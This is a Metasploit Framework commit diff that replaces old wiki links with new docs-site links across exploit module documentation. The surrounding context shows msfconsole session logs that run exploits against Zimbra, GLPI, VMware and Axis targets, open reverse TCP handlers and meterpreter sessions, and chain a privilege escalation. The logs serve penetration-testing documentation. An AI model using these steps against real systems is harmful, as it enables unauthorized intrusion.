Land #17426, Update all references to old Wiki to point to new docs site
This commit is contained in:
adfoster-r7
@@ -80,7 +80,7 @@ Module options (exploit/linux/http/apache_spark_rce_cve_2022_33891):
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOSTS 192.168.100.43 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
|
||||
RHOSTS 192.168.100.43 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
|
||||
RPORT 8080 yes The target port (TCP)
|
||||
SSL false no Negotiate SSL/TLS for outgoing connections
|
||||
TARGETURI / yes The URI of the vulnerable instance
|
||||
@@ -144,7 +144,7 @@ Module options (exploit/linux/http/apache_spark_rce_cve_2022_33891):
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOSTS 192.168.100.43 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
|
||||
RHOSTS 192.168.100.43 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
|
||||
RPORT 8080 yes The target port (TCP)
|
||||
SSL false no Negotiate SSL/TLS for outgoing connections
|
||||
TARGETURI / yes The URI of the vulnerable instance
|
||||
|
||||
@@ -64,7 +64,7 @@ Module options (exploit/linux/http/axis_app_install):
|
||||
---- --------------- -------- -----------
|
||||
PASSWORD root yes The password to authenticate with
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
|
||||
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
|
||||
RPORT 80 yes The target port (TCP)
|
||||
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
|
||||
SRVPORT 8080 yes The local port to listen on.
|
||||
@@ -103,7 +103,7 @@ msf6 exploit(linux/http/axis_app_install) > set LHOST 192.168.1.217
|
||||
LHOST => 192.168.1.217
|
||||
msf6 exploit(linux/http/axis_app_install) > run
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.1.217:4444
|
||||
[*] Started reverse TCP handler on 192.168.1.217:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] The target appears to be vulnerable. The target reports itself to be a 'AXIS M3044-V'.
|
||||
[*] Creating an application package named: jtn
|
||||
@@ -125,7 +125,7 @@ cat /proc/cpuinfo
|
||||
processor : 0
|
||||
model name : ARMv7 Processor rev 1 (v7l)
|
||||
BogoMIPS : 156.00
|
||||
Features : half thumb fastmult vfp edsp neon vfpv3 tls vfpd32
|
||||
Features : half thumb fastmult vfp edsp neon vfpv3 tls vfpd32
|
||||
CPU implementer : 0x41
|
||||
CPU architecture: 7
|
||||
CPU variant : 0x4
|
||||
|
||||
@@ -97,7 +97,7 @@ Module options (exploit/linux/http/f5_icontrol_rce):
|
||||
HttpPassword yes iControl password
|
||||
HttpUsername admin yes iControl username
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOSTS 10.0.0.133 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
|
||||
RHOSTS 10.0.0.133 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
|
||||
RPORT 443 yes The target port (TCP)
|
||||
SSL true no Negotiate SSL/TLS for outgoing connections
|
||||
TARGETURI / yes The base path to the iControl installation
|
||||
|
||||
@@ -49,7 +49,7 @@ Module options (exploit/linux/http/flir_ax8_unauth_rce_cve_2022_37061):
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
|
||||
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
|
||||
RPORT 80 yes The target port (TCP)
|
||||
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all add
|
||||
resses.
|
||||
@@ -113,7 +113,7 @@ Module options (exploit/linux/http/flir_ax8_unauth_rce_cve_2022_37061):
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
|
||||
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
|
||||
RPORT 80 yes The target port (TCP)
|
||||
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to li>
|
||||
resses.
|
||||
|
||||
@@ -68,7 +68,7 @@ Module options (exploit/linux/http/glpi_htmlawed_php_injection):
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOSTS 10.5.132.190 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
|
||||
RHOSTS 10.5.132.190 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
|
||||
RPORT 80 yes The target port (TCP)
|
||||
SSL false no Negotiate SSL/TLS for outgoing connections
|
||||
SSLCert no Path to a custom SSL certificate (default is randomly generated)
|
||||
@@ -93,7 +93,7 @@ Exploit target:
|
||||
|
||||
msf6 exploit(linux/http/glpi_htmlawed_php_injection) > run
|
||||
|
||||
[*] Started reverse TCP handler on 10.5.135.109:4444
|
||||
[*] Started reverse TCP handler on 10.5.135.109:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[*] token = 4578e2880dfc8091a10c38ea60ead228
|
||||
[*] sid = vitn15j8j9f0lljrfu7daq9es8
|
||||
@@ -125,7 +125,7 @@ msf6 exploit(linux/http/glpi_htmlawed_php_injection) > set payload cmd/unix/pyth
|
||||
payload => cmd/unix/python/meterpreter/reverse_tcp
|
||||
msf6 exploit(linux/http/glpi_htmlawed_php_injection) > run
|
||||
|
||||
[*] Started reverse TCP handler on 10.5.135.109:4444
|
||||
[*] Started reverse TCP handler on 10.5.135.109:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[*] token = 154f788cf9a685dac8753df78c6c3a1c
|
||||
[*] sid = 1mcp7n5vq9v6tnqlbm324qk9ce
|
||||
|
||||
@@ -43,7 +43,7 @@ Module options (exploit/linux/http/opentsdb_yrange_cmd_injection):
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOSTS 10.10.1.1 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
|
||||
RHOSTS 10.10.1.1 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
|
||||
RPORT 4242 yes The target port (TCP)
|
||||
SRVHOST 10.10.1.30 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0
|
||||
.0 to listen on all addresses.
|
||||
@@ -96,7 +96,7 @@ Module options (exploit/linux/http/opentsdb_yrange_cmd_injection):
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOSTS 10.10.1.1 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
|
||||
RHOSTS 10.10.1.1 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
|
||||
RPORT 4242 yes The target port (TCP)
|
||||
SRVHOST 10.10.1.30 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0
|
||||
.0.0 to listen on all addresses.
|
||||
|
||||
@@ -35,7 +35,7 @@ Module options (exploit/linux/http/sophos_utm_webadmin_sid_cmd_injection):
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
|
||||
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
|
||||
RPORT 4444 yes The target port (TCP)
|
||||
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
|
||||
SRVPORT 8080 yes The local port to listen on.
|
||||
|
||||
+2
-2
@@ -51,7 +51,7 @@ Module options (exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144):
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
|
||||
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
|
||||
RPORT 443 yes The target port (TCP)
|
||||
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machi
|
||||
ne or 0.0.0.0 to listen on all addresses.
|
||||
@@ -111,7 +111,7 @@ Module options (exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144):
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
|
||||
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
|
||||
RPORT 443 yes The target port (TCP)
|
||||
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machi
|
||||
ne or 0.0.0.0 to listen on all addresses.
|
||||
|
||||
@@ -36,7 +36,7 @@ Module options (exploit/linux/http/vmware_vcenter_analytics_file_upload):
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
|
||||
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
|
||||
RPORT 443 yes The target port (TCP)
|
||||
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
|
||||
SRVPORT 8080 yes The local port to listen on.
|
||||
|
||||
+1
-1
@@ -30,7 +30,7 @@ Module options (exploit/linux/http/vmware_workspace_one_access_cve_2022_22954):
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
|
||||
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
|
||||
RPORT 443 yes The target port (TCP)
|
||||
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
|
||||
SRVPORT 8080 yes The local port to listen on.
|
||||
|
||||
@@ -109,7 +109,7 @@ Module options (exploit/linux/http/zimbra_mboximport_cve_2022_27925):
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOSTS 10.0.0.166 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
|
||||
RHOSTS 10.0.0.166 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
|
||||
RPORT 7071 yes The target port (TCP)
|
||||
SSL true no Negotiate SSL/TLS for outgoing connections
|
||||
TARGET_FILENAME no The filename to write in the target directory; should have a .jsp extension (default: <random>.jsp).
|
||||
@@ -134,7 +134,7 @@ Exploit target:
|
||||
|
||||
msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 10.0.0.146:4444
|
||||
[*] Started reverse TCP handler on 10.0.0.146:4444
|
||||
[*] Encoding the payload as a .jsp file
|
||||
[*] Target filename: ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/nkxj.jsp
|
||||
[*] Sending POST request with ZIP file
|
||||
@@ -190,7 +190,7 @@ msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > set LHOST 10.0.0.146
|
||||
LHOST => 10.0.0.146
|
||||
msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 10.0.0.146:4444
|
||||
[*] Started reverse TCP handler on 10.0.0.146:4444
|
||||
[*] Encoding the payload as a .jsp file
|
||||
[*] Target filename: ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/cualvccyq.jsp
|
||||
[*] Sending POST request with ZIP file
|
||||
|
||||
+7
-7
@@ -39,14 +39,14 @@ In the following scenario, initial access is gained by first exploiting CVE-2022
|
||||
is elevated to root by exploiting CVE-2022-31660.
|
||||
|
||||
```
|
||||
msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > show options
|
||||
msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > show options
|
||||
|
||||
Module options (exploit/linux/http/vmware_workspace_one_access_cve_2022_22954):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOSTS 192.168.159.98 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
|
||||
RHOSTS 192.168.159.98 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
|
||||
RPORT 443 yes The target port (TCP)
|
||||
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
|
||||
SRVPORT 8080 yes The local port to listen on.
|
||||
@@ -73,7 +73,7 @@ Exploit target:
|
||||
|
||||
msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.159.128:4444
|
||||
[*] Started reverse TCP handler on 192.168.159.128:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] The target is vulnerable.
|
||||
[*] Executing cmd/unix/python/meterpreter/reverse_tcp (Unix Command)
|
||||
@@ -88,15 +88,15 @@ System Language : en_US
|
||||
Meterpreter : python/linux
|
||||
meterpreter > getuid
|
||||
Server username: horizon
|
||||
meterpreter > background
|
||||
meterpreter > background
|
||||
[*] Backgrounding session 1...
|
||||
msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > use exploit/linux/local/vmware_workspace_one_access_certproxy_lpe
|
||||
msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > use exploit/linux/local/vmware_workspace_one_access_certproxy_lpe
|
||||
[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
|
||||
msf6 exploit(linux/local/vmware_workspace_one_access_certproxy_lpe) > set SESSION -1
|
||||
SESSION => -1
|
||||
msf6 exploit(linux/local/vmware_workspace_one_access_certproxy_lpe) > run
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.250.134:4444
|
||||
[*] Started reverse TCP handler on 192.168.250.134:4444
|
||||
[*] Backing up the original file...
|
||||
[*] Writing '/opt/vmware/certproxy/bin/cert-proxy.sh' (601 bytes) ...
|
||||
[*] Triggering the payload...
|
||||
@@ -113,5 +113,5 @@ OS : Linux 4.19.217-1.ph3 #1-photon SMP Thu Dec 2 02:29:27 UTC 2021
|
||||
Architecture : x64
|
||||
System Language : en_US
|
||||
Meterpreter : python/linux
|
||||
meterpreter >
|
||||
meterpreter >
|
||||
```
|
||||
|
||||
@@ -35,7 +35,7 @@ Module options (exploit/linux/misc/cisco_rv340_sslvpn):
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
|
||||
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
|
||||
RPORT 8443 yes The target port (TCP)
|
||||
SSL true yes Use SSL
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
Reference in New Issue
Block a user